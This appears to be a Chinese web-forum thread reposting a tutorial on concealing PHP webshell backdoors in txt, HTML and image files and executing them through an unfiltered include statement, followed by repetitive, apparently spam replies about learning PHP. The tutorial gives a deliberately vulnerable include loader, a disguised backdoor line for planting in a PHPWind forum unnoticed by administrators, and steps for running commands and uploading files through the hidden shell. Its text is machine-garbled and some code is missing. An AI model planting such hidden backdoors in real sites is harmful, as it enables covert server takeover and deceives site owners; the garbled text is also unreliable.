仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 1458|回复: 18
打印 上一主题 下一主题

[学习教程] PHP编程:PHP后门的埋没技能测试呈报

[复制链接]
小魔女 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-2-3 23:53:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
基础这个东西是个比较笼统的概念,如果你之前学习过c语言, c语言被认为是   比来良多伴侣都在问我是不是能把我那一句话木马埋没到HTML或图片里,其实把一句话木马拔出到PHP文件中就已很荫蔽了,假如说硬是要放到HTML文件或图片里,就接着往下看这篇的篇测试呈报吧。要晓得假如光把PHP语句放到图片里是不管若何也不克不及履行的,由于PHP只解析扩大名为php的文件。所以说要能使埋没在图片里的PHP语句履行。咱们就的借助PHP中的挪用函数 :include 、require 等。
ASP中语句看似十分荫蔽但直接挪用图片对略微懂点PHP的人就不难发明可疑的地方。因为URL 里用GET体例很难传递参数,这就使得拔出木马的功能得不到发扬。
Include 函数在PHP中利用的对照频仍,所以引发的平安成绩也其实太多,例如PHPWIND1.36的破绽就是由于include前面的变量没做过滤引发的。由此咱们就能够机关相似的语句来拔出到PHP文件中。然后把木马埋没到图片或HTML文件里,可以说荫蔽性就更高了。如在PHPWIND服装论坛里拔出上面的语句:<‘’?@include includ/.$PHPWIND_ROOT;? > 普通办理员是没法看出来的。
有了include 函数来帮助协助咱们就能够把PHP木马埋没到 诸如 txt、html和图片文件等良多类型的文件里来了。由于txt、html和图片文件这三品种型的文件最不管在服装论坛仍是文章体系里是最为罕见的了,上面咱们就顺次来做测试。
起首创立一PHP文件test.php 文件内容为:
$test=$_GET['test'];
@include 'test/'.$test;
?>
Txt文件普通都是申明文件,所以咱们把一句话木马放到目次的申明文件里就OK了。随意创立一个TXT文件t.txt。咱们把一句话木马粘贴到t.txt文件里。然后会见 http://localhost/test/test.php?test=../t.txt 假如你看到t.txt的内容就证实Ok了, 然后把在lanker微型PHP后食客户端 木马地址添入 http://localhost/test/test.php?test=../t.txt 暗码里添入cmd就能够了,履行前往的了局都可以看到。
关于HTML的文件,普通都为模版文件。为了使拔出到HTML的文件的木马能被挪用履行并且不被显示出来,咱们可以在HTML里到场一个埋没属性的文本框 ,如: 然后利用办法同上。履行的前往了局普通都可以检查源文件看到。 如利用检查本法式目次功效。检查源文件内容为 我可以失掉目次为 C:\Uniserver2_7s\www\test。
上面咱们说说图片文件,要说最为毒的一招莫过于把木马埋没到图片里。咱们可以直接对一个图片停止编纂,把拔出到图片末尾
经测试普通都不会对图片形成影响。然后一样办法客户端木马地址添入
咱们检查PHP情况变量 前往的是了局是原图片。
这里能够要和咱们想象的了局有些差距了,其实号令已运转了,只是前往的了局看不到罢了,由于这是真实的GIF文件,所所以不会显示前往了局的,为了证实是不是真的履行了号令咱们 履行上传文件号令。果不出所料,文件已胜利上传到办事器上。如许捏造的长处是荫蔽性好。弱点也天然不必说了是没回显。假如你想看到前往的了局,那就拿出记事本捏造一个假的图片文件吧。
到这里就根基测试完了,如何荫蔽PHP后门就看你本人的选择了。行文仓皇,若有不当的地方,请指出!

可以说你的马步已经扎的差不多了,接下来就要开始练把势的时候了,如果有条件的话,用笔或者打印一个简易的PHP手册在身上,时不时的摸出来看看,记得,去WC也不能放过(^2^)。
灵魂腐蚀 该用户已被删除
沙发
发表于 2015-2-4 06:53:17 | 只看该作者
本文当是我的笔记啦,遇到的问题随时填充
分手快乐 该用户已被删除
板凳
发表于 2015-2-7 07:16:45 | 只看该作者
如果你可以写完像留言板这样的程序,那么你可以去一些别人的代码了,
山那边是海 该用户已被删除
地板
发表于 2015-2-16 12:38:58 | 只看该作者
实践是检验自己会不会的真理。
小女巫 该用户已被删除
5#
发表于 2015-2-28 13:05:50 | 只看该作者
首推的搜索引擎当然是Google大神,其次我比较喜欢 百度知道。不过搜出来的结果往往都是 大家copy来copy去的,运气的的概率很大。
再现理想 该用户已被删除
6#
发表于 2015-3-1 14:16:04 | 只看该作者
如果你可以写完像留言板这样的程序,那么你可以去一些别人的代码了,
飘飘悠悠 该用户已被删除
7#
发表于 2015-3-7 01:01:43 | 只看该作者
本文当是我的笔记啦,遇到的问题随时填充
柔情似水 该用户已被删除
8#
发表于 2015-3-13 23:09:48 | 只看该作者
找到的的资料很多都是在论坛里的,需要注册,所以我一般没到一个论坛都注册一个id,所有的id都注册成一样的,这样下次再进来的时候就不用重复注册啦。当然有些论坛的某些资料是需要的付费的。
海妖 该用户已被删除
9#
发表于 2015-3-17 05:10:23 | 只看该作者
有位前辈曾经跟我说过,phper 至少要掌握200个函数 编起程序来才能顺畅点,那些不熟悉的函数记不住也要一拿手册就能找到。所以建议新手们没事就看看php的手册(至少array函数和string函数是要记牢的)。
小妖女 该用户已被删除
10#
发表于 2015-3-21 03:06:04 | 只看该作者
有位前辈曾经跟我说过,phper 至少要掌握200个函数 编起程序来才能顺畅点,那些不熟悉的函数记不住也要一拿手册就能找到。所以建议新手们没事就看看php的手册(至少array函数和string函数是要记牢的)。
冷月葬花魂 该用户已被删除
11#
发表于 2015-3-21 09:45:23 | 只看该作者
至于模板嘛,各位高人一直以来就是争论不休,我一只小菜鸟就不加入战团啦,咱们新手还是多学点东西的好。
爱飞 该用户已被删除
12#
发表于 2015-3-25 10:17:56 | 只看该作者
Ps:以上纯属原创,如有雷同,纯属巧合
莫相离 该用户已被删除
13#
发表于 2015-3-27 06:22:53 | 只看该作者
这些都是最基本最常用功能,我们这些菜鸟在系统学习后,可以先对这些功能深入研究。
透明 该用户已被删除
14#
发表于 2015-3-30 19:29:48 | 只看该作者
多看优秀程序员编写的代码,仔细理解他们解决问题的方法,对自身有很大的帮助。
简单生活 该用户已被删除
15#
发表于 2015-4-16 03:10:08 | 只看该作者
环境搭建好,当你看见你的浏览器输出“it works\\\\\\\"时你一定是喜悦的。在你解决问题的时候,我强烈建议多读php手册。
兰色精灵 该用户已被删除
16#
发表于 2015-4-25 13:45:52 | 只看该作者
php是动态网站开发的优秀语言,在学习的时候万万不能冒进。在系统的学习前,我认为不应该只是追求实现某种效果,因为即使你复制他人的代码调试成功,实现了你所期望的效果,你也不了解其中的原理。
飘灵儿 该用户已被删除
17#
发表于 2015-4-26 11:59:46 | 只看该作者
对于初学者来说不推荐去拿钱买的。当然如果一个网站你经常去用,而且里面的资料也比较有用,最好还是买个会员比较好,毕竟那些也是别人的工作成果。
因胸联盟 该用户已被删除
18#
发表于 2015-5-3 18:53:52 | 只看该作者
开发工具也会慢慢的更专业,每个公司的可能不一样,但是zend studio是个大伙都会用的。
乐观 该用户已被删除
19#
发表于 2015-5-4 08:05:01 | 只看该作者
最后祝愿,php会给你带来快乐的同时 你也会给他带来快乐。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-5-9 17:48

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表